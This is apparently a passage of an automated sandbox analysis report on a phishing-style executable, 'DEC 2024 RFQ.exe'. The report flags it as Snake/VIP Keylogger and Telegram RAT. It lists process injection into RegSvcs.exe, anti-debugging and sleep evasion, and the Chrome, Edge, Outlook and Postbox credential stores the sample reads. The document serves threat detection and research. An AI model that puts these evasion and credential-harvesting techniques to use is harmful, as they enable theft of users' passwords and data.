                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0008F0F2
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0008F3F3
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_000837EF
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00083B12
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0008BCBC
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000249A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599435Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: RegSvcs.exe, 00000001.00000002.4149426498.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeAPI call chain: ExitProcess graph end nodegraph_0-100609
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeAPI call chain: ExitProcess graph end nodegraph_0-100828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06589548 LdrInitializeThunk,LdrInitializeThunk,1_2_06589548
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00093F09 BlockInput,0_2_00093F09
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00023B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00023B3A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00055A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00055A7C
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00024B37 LoadLibraryA,GetProcAddress,0_2_00024B37
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0173B060 mov eax, dword ptr fs:[00000030h]0_2_0173B060
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0173C710 mov eax, dword ptr fs:[00000030h]0_2_0173C710
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0173C6B0 mov eax, dword ptr fs:[00000030h]0_2_0173C6B0
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_000780A9
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004A124 SetUnhandledExceptionFilter,0_2_0004A124
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0004A155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A72008Jump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000787B1 LogonUserW,0_2_000787B1
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00023B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00023B3A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000248D7
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00084C27 mouse_event,0_2_00084C27
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\DEC 2024 RFQ.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00077CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00077CAF
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0007874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0007874B
                  Source: DEC 2024 RFQ.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: DEC 2024 RFQ.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004862B cpuid 0_2_0004862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00054E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00054E87
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00061E06 GetUserNameW,0_2_00061E06
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00053F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00053F3A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000249A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: DEC 2024 RFQ.exe, 00000000.00000003.1666453279.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664147145.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664322405.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666971979.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1665224245.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666649288.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664422494.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664676808.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1665689565.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666154606.0000000001750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: DEC 2024 RFQ.exeBinary or memory string: WIN_81
                  Source: DEC 2024 RFQ.exeBinary or memory string: WIN_XP
                  Source: DEC 2024 RFQ.exeBinary or memory string: WIN_XPe
                  Source: DEC 2024 RFQ.exeBinary or memory string: WIN_VISTA
                  Source: DEC 2024 RFQ.exeBinary or memory string: WIN_7
                  Source: DEC 2024 RFQ.exeBinary or memory string: WIN_8
                  Source: DEC 2024 RFQ.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00096283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00096283
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00096747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00096747

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts                  		12
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Valid Accounts                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		121
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		4
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		Security Account Manager1
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS127
                  System Information Discovery                  		Distributed Component Object Model1
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		2
                  Valid Accounts                  		LSA Secrets241
                  Security Software Discovery                  		SSH121
                  Input Capture                  		14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials11
                  Virtualization/Sandbox Evasion                  		VNC3
                  Clipboard Data                  		Multiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Access Token Manipulation                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  DEC 2024 RFQ.exe39%ReversingLabsWin32.Trojan.AutoitInject
                  DEC 2024 RFQ.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

